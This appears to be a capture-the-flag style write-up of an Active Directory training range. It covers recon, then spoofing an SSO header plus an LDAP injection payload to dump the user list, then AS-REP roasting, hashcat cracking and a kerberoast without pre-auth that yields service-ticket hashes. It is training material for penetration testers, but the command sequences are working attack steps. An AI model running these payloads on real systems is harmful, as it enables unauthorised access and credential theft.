Westbridge University - Hack Smarter Range [Hard]

Westbridge University - Hack Smarter Range [Hard]

Sebin Thomas

Westbridge University is a multi-host Active Directory range on Hack Smarter built around a two-domain forest. The environment is designed to simulate a realistic enterprise network and provides a challenging internal penetration testing scenario involving multiple hosts, users, and domain relationships.

The goal is to conduct a comprehensive internal pentest and ultimately achieve Domain Admin privileges across the forest.


Scope & network map

Two subnets, seven targets, two domains joined by a bidirectional forest trust.

1
2
WESTBRIDGE.HSM  ◀──── bidirectional forest trust ────▶  WESTBRIDGE-RESEARCH.HSM
DC / FILES / SQL / HELPDESK-WS / WEB(linux) WEB / DC02

Phase 0 - Recon

A sweep of subnet 1 - only 3 of the 5 hosts answer (.20/SQL and .25/HELPDESK-WS are down at this stage) - shows a textbook AD layout: a DC on .5, a file server on .15, and a Linux web host on .10 exposing SSH, HTTP, and something on :5000.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nmap -v -iL subnet1 -sC
Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-24 08:49 -0400
NSE: Loaded 127 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:49
Completed NSE at 08:49, 0.00s elapsed
Initiating NSE at 08:49
Completed NSE at 08:49, 0.00s elapsed
Initiating Ping Scan at 08:49
Scanning 5 hosts [4 ports/host]
Completed Ping Scan at 08:49, 2.85s elapsed (5 total hosts)
Initiating Parallel DNS resolution of 3 hosts. at 08:49
Completed Parallel DNS resolution of 3 hosts. at 08:49, 2.50s elapsed
Nmap scan report for 10.0.10.25 [host down]
Nmap scan report for 10.0.10.20 [host down]
Initiating SYN Stealth Scan at 08:49
Scanning 3 hosts [1000 ports/host]
Discovered open port 80/tcp on 10.0.10.10
Discovered open port 3389/tcp on 10.0.10.15
Discovered open port 3389/tcp on 10.0.10.5
Discovered open port 135/tcp on 10.0.10.15
Discovered open port 135/tcp on 10.0.10.5
Discovered open port 445/tcp on 10.0.10.15
Discovered open port 445/tcp on 10.0.10.5
Discovered open port 22/tcp on 10.0.10.10
Discovered open port 5000/tcp on 10.0.10.10
Discovered open port 139/tcp on 10.0.10.5
Discovered open port 139/tcp on 10.0.10.15
Discovered open port 53/tcp on 10.0.10.5
Discovered open port 88/tcp on 10.0.10.5
Discovered open port 636/tcp on 10.0.10.5
Discovered open port 464/tcp on 10.0.10.5
Discovered open port 389/tcp on 10.0.10.5
Discovered open port 3268/tcp on 10.0.10.5
Discovered open port 3269/tcp on 10.0.10.5
Completed SYN Stealth Scan against 10.0.10.10 in 50.69s (2 hosts left)
Discovered open port 5985/tcp on 10.0.10.15
Completed SYN Stealth Scan against 10.0.10.15 in 56.45s (1 host left)
Discovered open port 593/tcp on 10.0.10.5
Discovered open port 5985/tcp on 10.0.10.5
Completed SYN Stealth Scan at 08:50, 58.17s elapsed (3000 total ports)
NSE: Script scanning 3 hosts.
Initiating NSE at 08:50
Completed NSE at 08:51, 46.20s elapsed
Initiating NSE at 08:51
Completed NSE at 08:51, 0.00s elapsed
Nmap scan report for 10.0.10.5
Host is up (0.28s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
| ssl-cert: Subject: commonName=DC.westbridge.hsm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.westbridge.hsm
| Issuer: commonName=CA01-AD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-07-04T17:04:11
| Not valid after: 2027-07-04T17:04:11
| MD5: 69d0 0b64 a174 8d8f 5af8 47c2 9925 4ff6
| SHA-1: 1520 b7f0 d1ac af9e 9453 7dc9 bc02 b897 7e20 508f
|_SHA-256: 9d1a f795 bc5e ab84 fa1a 8383 b947 593f 0679 74a4 0ac1 7c9c a761 b72f c616 ebe5
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
| ssl-cert: Subject: commonName=DC.westbridge.hsm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.westbridge.hsm
| Issuer: commonName=CA01-AD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-07-04T17:04:11
| Not valid after: 2027-07-04T17:04:11
| MD5: 69d0 0b64 a174 8d8f 5af8 47c2 9925 4ff6
| SHA-1: 1520 b7f0 d1ac af9e 9453 7dc9 bc02 b897 7e20 508f
|_SHA-256: 9d1a f795 bc5e ab84 fa1a 8383 b947 593f 0679 74a4 0ac1 7c9c a761 b72f c616 ebe5
|_ssl-date: TLS randomness does not represent time
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
| ssl-cert: Subject: commonName=DC.westbridge.hsm
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.westbridge.hsm
| Issuer: commonName=CA01-AD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-07-04T17:04:11
| Not valid after: 2027-07-04T17:04:11
| MD5: 69d0 0b64 a174 8d8f 5af8 47c2 9925 4ff6
| SHA-1: 1520 b7f0 d1ac af9e 9453 7dc9 bc02 b897 7e20 508f
|_SHA-256: 9d1a f795 bc5e ab84 fa1a 8383 b947 593f 0679 74a4 0ac1 7c9c a761 b72f c616 ebe5
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: WESTBRIDGE
| NetBIOS_Domain_Name: WESTBRIDGE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: westbridge.hsm
| DNS_Computer_Name: DC.westbridge.hsm
| DNS_Tree_Name: westbridge.hsm
| Product_Version: 10.0.26100
|_ System_Time: 2026-08-24T12:50:54+00:00
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.westbridge.hsm
| Issuer: commonName=DC.westbridge.hsm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-07-02T12:41:18
| Not valid after: 2027-01-01T12:41:18
| MD5: de97 5f2f b906 474e fb48 2af2 f15a 9b87
| SHA-1: 45e9 eed4 c533 ea33 e2ee e343 2eb9 7ced 122c 7e38
|_SHA-256: 37c7 99cd 5c55 5ac9 618b 5661 289e 37b9 d9fc fff4 632c 5e3f 24e5 3f79 806e 2fbf
5985/tcp open wsman

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-08-24T12:50:57
|_ start_date: N/A

Nmap scan report for 10.0.10.15
Host is up (0.28s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
|_ssl-date: TLS randomness does not represent time
| rdp-ntlm-info:
| Target_Name: WESTBRIDGE
| NetBIOS_Domain_Name: WESTBRIDGE
| NetBIOS_Computer_Name: FILES
| DNS_Domain_Name: westbridge.hsm
| DNS_Computer_Name: FILES.westbridge.hsm
| DNS_Tree_Name: westbridge.hsm
| Product_Version: 10.0.26100
|_ System_Time: 2026-08-24T12:50:55+00:00
| ssl-cert: Subject: commonName=FILES.westbridge.hsm
| Issuer: commonName=FILES.westbridge.hsm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-07-02T19:53:42
| Not valid after: 2027-01-01T19:53:42
| MD5: 73cd 6957 19fc b4e8 3664 93aa 8924 ea2f
| SHA-1: a806 59e5 b095 a802 19df 72a5 3105 a03d 699f f84d
|_SHA-256: bc00 3aa2 aeca c6bf 5028 bb8e d55a e6c0 5c72 fb42 48d7 f6b3 5078 774a 4172 3826
5985/tcp open wsman

Host script results:
| smb2-time:
| date: 2026-08-24T12:51:02
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

Nmap scan report for 10.0.10.10
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 256 13:d1:4e:e8:24:08:18:db:cf:34:25:c7:7a:44:b8:c9 (ECDSA)
|_ 256 8f:3d:1f:94:93:19:44:8f:4c:60:bb:2f:72:e0:52:6b (ED25519)
80/tcp open http
|_http-title: Westbridge University | Excellence in Education & Research
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
5000/tcp open upnp

NSE: Script Post-scanning.
Initiating NSE at 08:51
Completed NSE at 08:51, 0.00s elapsed
Initiating NSE at 08:51
Completed NSE at 08:51, 0.00s elapsed
Post-scan script results:
| clock-skew:
| 0s:
| 10.0.10.5
|_ 10.0.10.15
Read data files from: /usr/share/nmap
Nmap done: 5 IP addresses (3 hosts up) scanned in 110.01 seconds
Raw packets sent: 5092 (223.884KB) | Rcvd: 1108 (44.628KB)
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

Nmap scan report for 10.0.10.15 → 135,139,445,3389,5985 (NetBIOS_Computer_Name: FILES)
Nmap scan report for 10.0.10.10 → 22 (OpenSSH), 80 (http "Westbridge University"), 5000 (upnp)

Note the DC certificate is issued by CA01-AD-CA - there’s an AD CS in play, worth remembering. Null / guest sessions get nowhere (signing required, no anonymous RID brute):

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb subnet1 -u '' -p '' --rid-brute
SMB 10.0.10.5 445 DC [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC) (domain:westbridge.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.10.15 445 FILES [*] Windows 11 / Server 2025 Build 26100 x64 (name:FILES) (domain:westbridge.hsm) (signing:True) (SMBv1:None)
SMB 10.0.10.5 445 DC [+] westbridge.hsm\:
SMB 10.0.10.15 445 FILES [-] westbridge.hsm\: STATUS_ACCESS_DENIED
SMB 10.0.10.5 445 DC [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
SMB 10.0.10.15 445 FILES [-] Error creating DCERPC connection: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ nxc smb subnet1 -u 'guest' -p 'guest' --rid-brute
SMB 10.0.10.5 445 DC [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC) (domain:westbridge.hsm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.10.15 445 FILES [*] Windows 11 / Server 2025 Build 26100 x64 (name:FILES) (domain:westbridge.hsm) (signing:True) (SMBv1:None)
SMB 10.0.10.5 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 10.0.10.15 445 FILES [-] Connection Error: The NETBIOS connection with the remote host timed out.
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

So the web app on :5000 is the obvious first door.


Phase 1 - Web foothold: SSO header trust + LDAP injection

The People Directory app on 10.0.10.10:5000 doesn’t accepts any default credentials, and its public profiles already leak a couple of real addresses (s.harrison@westbridge.hsm, admissions@westbridge.hsm) - but the real prize is in robots.txt:

1
2
3
$ curl http://10.0.10.10:5000/robots.txt
User-agent: *
Disallow: /static/people-directory.conf.bak

That backup is a legacy Apache reverse-proxy config:

1
2
3
4
5
6
7
8
9
10
11
# Westbridge University - People Directory - Legacy Reverse Proxy Configuration
# DEPRECATED - retained for migration compatibility
<VirtualHost *:80>
ServerName directory.westbridge.hsm
ProxyPreserveHost On
# Authentication is performed by the university SSO gateway.
# Forward authenticated identity to the directory backend.
RequestHeader set X-Remote-User "%{REMOTE_USER}s"
ProxyPass / http://127.0.0.1:5000/
ProxyPassReverse / http://127.0.0.1:5000/
</VirtualHost>

The backend trusts the X-Remote-User header for identity. Because we can reach :5000 directly, we set that header ourselves - authenticating as anyone the app respects.



The directory’s search endpoint builds an LDAP filter from user input with no sanitisation, so a classic LDAP injection )(objectClass=* turns “search” into “dump everything”:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ curl -s 'http://10.0.10.10:5000/api/search?q=)(objectClass=*' -H "X-Remote-User: admin" | jq | head
{
"count": 38,
"results": [
{
"accountType": "Administrator",
"department": "N/A",
"displayName": "Administrator",
"email": "N/A",
"isPrivileged": true,
"jobTitle": "N/A",

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ curl -s 'http://10.0.10.10:5000/api/search?q=)(objectClass=*' -H "X-Remote-User: admin" | jq -r '.results[].username'
Administrator
Guest
krbtgt
m.thompson
r.anderson
c.wilson
d.parker
s.harrison
svc_legacy
svc_mssql
o.carter
n.brooks
e.foster
l.reed
c.ward
a.price
d.murphy
l.cole
o.griffin
h.powell
i.bishop
c.hayes
j.walsh
p.sullivan
t.russell
c.anderson
b.wellington
svc_files
svc_web
svc_krb_t2
a.pherson
d.hoff
b.jones
a.owen
researchoperator
svc_webmonitor
j.bennett
s.adams
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ curl -s 'http://10.0.10.10:5000/api/search?q=)(objectClass=*' -H "X-Remote-User: admin" | jq '.count'
38
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ curl -s 'http://10.0.10.10:5000/api/search?q=)(objectClass=*' -H "X-Remote-User: admin" | jq -r '.results[].username' | sort -u > users.txt
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat users.txt
Administrator krbtgt m.thompson r.anderson c.wilson d.parker
s.harrison svc_legacy svc_mssql o.carter n.brooks e.foster
l.reed c.ward a.price d.murphy l.cole o.griffin
h.powell i.bishop c.hayes j.walsh p.sullivan t.russell
c.anderson b.wellington svc_files svc_web svc_krb_t2 a.pherson
d.hoff b.jones a.owen researchoperator svc_webmonitor
j.bennett s.adams

38 accounts - real users plus juicy service accounts (svc_legacy, svc_mssql, svc_web, svc_files, svc_krb_t2, svc_webmonitor) and a cross-forest researchoperator.


Phase 2 - Kerberos: AS-REP roast → kerberoast without pre-auth

One account, svc_legacy, has “do not require pre-auth” set - AS-REP roastable:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-GetNPUsers westbridge.hsm/ -usersfile users.txt -dc-ip 10.0.10.5 -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.owen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.pherson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.price doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.jones doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.wellington doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.hayes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.hoff doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.murphy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User e.foster doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
[-] User h.powell doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User i.bishop doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.bennett doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.walsh doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User l.cole doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User l.reed doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User n.brooks doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.carter doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.griffin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User p.sullivan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User researchoperator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.adams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.harrison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_files doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_krb_t2 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc_legacy@WESTBRIDGE.HSM:da1804970c90526ba8469263e01c1aab$d38ba74a924e88fb59afe8cfe97a44dd00dd2724079b40733d7887ab94ac4c10eed574a360ad61762bd04efc7e4887a7877c06b5a9ac157003e24b503aa899c91431de505ff2e43cc8bad3c1a5b08d2a03909d65b12369f62cd92fe74bb1a02cba5b5ba7a9b2a6d605db63e05c7ce01453b37be251c7a888cc42b5a146c255f965df3c6b23f365dac7d0442e0893d0be1b122231e82c636fc053d1adac7f3834fdb494a89c020722b8b12bd176f0e7f012abd223ee3544c5cb9f43bf34e93f8ad370f89f05d87855dab0dba5960e231068705904281a69f6adc4ef1ba52dab98759481b4cc30102ecf656160e0c076a4
[-] User svc_mssql doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_web doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_webmonitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User t.russell doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ hashcat -m 18200 hashes.txt rockyou_costum.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz, 2929/5859 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (3825 MB free)

Dictionary cache built:
* Filename..: rockyou_costum.txt
* Passwords.: 5005
* Bytes.....: 49090
* Keyspace..: 5005
* Runtime...: 0 secs

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc_legacy@WESTBRIDGE.HSM:da1804970c9...c076a4
Time.Started.....: Mon Aug 24 09:26:37 2026 (0 secs)
Time.Estimated...: Mon Aug 24 09:26:37 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (rockyou_costum.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 84405 H/s (1.28ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 5005/5005 (100.00%)
Rejected.........: 0/5005 (0.00%)
Restore.Point....: 5005/5005 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: taniafaye -> sexcluff
Hardware.Mon.#01.: Util: 26%

Started: Mon Aug 24 09:26:11 2026
Stopped: Mon Aug 24 09:26:39 2026

The AS-REP hash didn’t crack against the wordlist - but an AS-REP-roastable account can request service tickets without a password, so we pivot straight into a kerberoast without pre-auth to pull TGS hashes for every SPN account:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ impacket-GetUserSPNs westbridge.hsm/ -no-preauth svc_legacy -usersfile users.txt -dc-ip 10.0.10.5 -request -outputfile kerberoast_output.txt

┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat kerberoast_output.txt
$krb5tgs$18$krbtgt$WESTBRIDGE.HSM$*krbtgt*$c2d088280a40ff38a99c9fae$29ce69f9f4c807294c6b4dd4e2e070ce719de4cc8d066f0f33982306ba88622d4bdbca745874ec815ef773aa2c0298301972abc7d4427474f7a4a2d0c4d9407b4bba03d476590eccfb2d36fa1bf4d0ebfc6c0cc92b018fc992038f15c8b80e520080def5514ceffc9e8d6e31720b009f8df46a40d9adc23ffc1da15bd27560a7adec11be92c536413fa6fac0f1049980f1ac7071899ce2c28d285a61389d3e91e87cb1f58dc7e74a8fbe4d46b5a6a584811eb3bccd318011dc11bc6a876d2ea195b015b0ab3c0b1427783df08818725f5ab3639b15f8da6c8be4a4dea33ce27d65f34da920160672a2178eab6a7768a626861bbd555deace9da09be125ba8a656a593b3bc6141d499e3ed275727fa1bc93f4226557e91ec2bfbc0fda2e6b0c2e1714c7b13bd4393f21310d18f550a1ab14d8779cb6d13aa76b75064b1ea975aa624185051d1f0a08a9e5ad05d07938365819bfbc79a45a8f8689f29b96e5d0e7249b43ce8dbf541fc0c6c723b9068a146ca3490df2faa73fccbc901ae508eb6a46f1267974e37a53da4972981b40d73ef44895b3398ceb009c4619fd9e16c44d4db7ee88165708b46df5f1e331e012fd8d772ffbe18db8a6758edf84d6a0c77e9a62004b115babd55583bb484f7d40cf66c464a72eb5a619126e960b5b430538d38cb055442b3d532b53a77c6f28f553e9e3501e00b68594bfb0f2d9acfb972ad93ad197e27ade033f9dd93d19adc6b3e15c8d15e77e7a349c9bd435c52b188a1a849a283846114b18b0ac1ed53f835b05f0bc3ae4217143079eaf97d5c987d76777be36979f9eefe0bb34192f36a38972163670968c84ae6679d299eda729917a13625155fe5cc1851dfc32601f6e821fcd8ec8d6dc020e3c1513b38ce9f3d95638c40dcde67cc894b9b160de09ba16507338fc228bf15137c7138ea78153e7a8da393a30bcc73e42ef3f90a2765026ee86ee269f319f2faff69b7380c33951ea8a2475cbb937f5f57fff35ea3663a0fb86b5da69ae14fba1451d8e620b32cb9def2b64e79070efa2e2c91b9ff489cfaa07b454d1a7e55daa1e032abc57f9fca993f986e4279ee3a54668203bb4a5ec7f94de55e81a3672415b6d7b9af08d71388d5e27a676043f775e4dabd3bab640e69cb69f5cd567c75659913a6a815cf2f42caad8c32cc964784911834e469660d8760b74dae119ec40d2763bdb19e7a801db97ecb4171fbb25ed323d749c821ca3daa3297aa0c95e61fe934c2a07c81204ded2a464bb6676e4d9e658196e5e0de1c70434095ebe90761cc71440842877d4262406898fc337adcf5f3804e9e06663f4aa36183f04b75b72aad0fed3cd6bedfbcf4a331da3cba5029f1099a606be82b1222fecabe1bb80a047d4504a557b44e00233706cda1ff30ab44cdbb868c8fc95a80ac057c7407c874e484bd0b3e7cbb002f3f58efd126a727e877e714b02c29ab2e2844eb799c1ad662dcf10a02a83b616571d182e85b9a9f438143ec85dcc703deea2cd94f0ce86272e08fb1fa9e901a3f8b060839ae26c535249b135aea9ea073bd9d6a83a01
$krb5tgs$18$svc_files$WESTBRIDGE.HSM$*svc_files*$c1ff1db08e23e4bd5abb4aee$85edf4abc21627bec75febf9c4572f92033ece1d840a82519becebdc21a21902b71ca978833e7d51eb3411ef6d7688067147badd182c6656bbc39a1c0e5aceca29ea75f9021ab6124b4ae6476f303236dac69392777c2f14162cc99f5aa551e8ac983b8dc51085997c6dfb0e0f715aebf53bb98752b6aacb65ac74a2759a9e30d548daaa779c4ec41e6e9d2fb5fc39002935dfe7d13cb0da53cfa7bb877a4eb0906a83a36c0fd5833bfae263cbf0da905e71b7e03b021a1f00930a5534b69871ef179da47aa16457d0ce7e6ee8a3bd931b0ec192d6971257967e06231676820f7b71b24718e887caa8a392e4461bd1537d5f98125a73d2466fe3c721e7308304bce58678987b51366f309752186071dd14eca1e2e77207dd4cc7abe9662802274fb355d7486526c622bdd9e76a6a9b34f1a1b7f86fb43517407fd543c2b1503db9c24b1cf0bc96b8e1f064f7b20cef28ab171e08fa089f487b5f4160e0571507f5537aed9784567a92ed741951ebb823bbb2371bfe2315b1f57d4a8f71f0f8b728b1aa23ecade2c8a383b362fe3813f240ea7aae21a45e04ed8265e91e5963a46a24de5d4663dff1aa2b5cf5d2c412be8420270268d661ebfe5ee3ebb84e6ae8ed4627f98f32049e6848553e7df9a0cb5392fd673790607c3b15bdd97cede861e34ad4e3a0f5d6fcb60fddd4fe104717b314c3769448040307fb279cbef64a9f33d5c1785ae6098dbc9481d56df1c19f57b6ea706895d6e8e4ea8b4807112e2389a59370f5f78dfd0b2f0a68e88fbccb8f388164d6114affe32f32c09b9b405a1094f9b2a8e9626e381dde5896b4461dedb57ed342356ab87b173921d8fdc3c4083bba2d375ad1c67cdc48241a3dd105ffa4f06f45523fd5b1039c139378d4513aac39d80d3176dad02c433415d97027bd574df0cceb97aeb9c644d42034fe1b1e2c6f1eefeae0f780315921bcb711c852a0a77a8a845b86b495904c855515c37d75bc5ed44f2fb61b5e1ec5f88e84b9c6dfd38382e9f4bd7fb70d0319d258a6e9b73ae383c29f3abc5c24d9ceea12bc4a3faaa5ed7ae59eb997ef41b8b1e091f958d3c8542435109466494b1cd7723a6674f004e8f05224669bca2564a9be793a28a5f859c193f19e0b8c2fefbfd0fc603d70ec12e26173cd84212c97e2570a95ca269a40ae7253aea7a4d04672d682bc1547cff92548bb153853de6cd8cc1fd6126e60f95b8845417c82295b3ad563bfd861a0a08090fba9ad933cf8283e31b548b2cb945833bf8be52aad4ff891db2c955c5280faec6208008f44bd3295741ff93c3405ec9a0a11bf186a1a5a4ddfc97d60712d676cb37ed53b774a46e669d45ae5c73708bf9b20be954ba9663efe837f5dd07072ec4418c10e60068638e3a78752315f75755bd93697928256ffad762da40371fcd63481bc684fa29fcf4035b71a98fc79e495dd596488bad047edd29763bf24b1dbe714bb72f1e12ae6f870e6f9c0159d490c18e2d476b9841172b2dce2ceff7866fd5e4e1f2251d479046860fdbee7d4388dddea4b2b94300fb98b
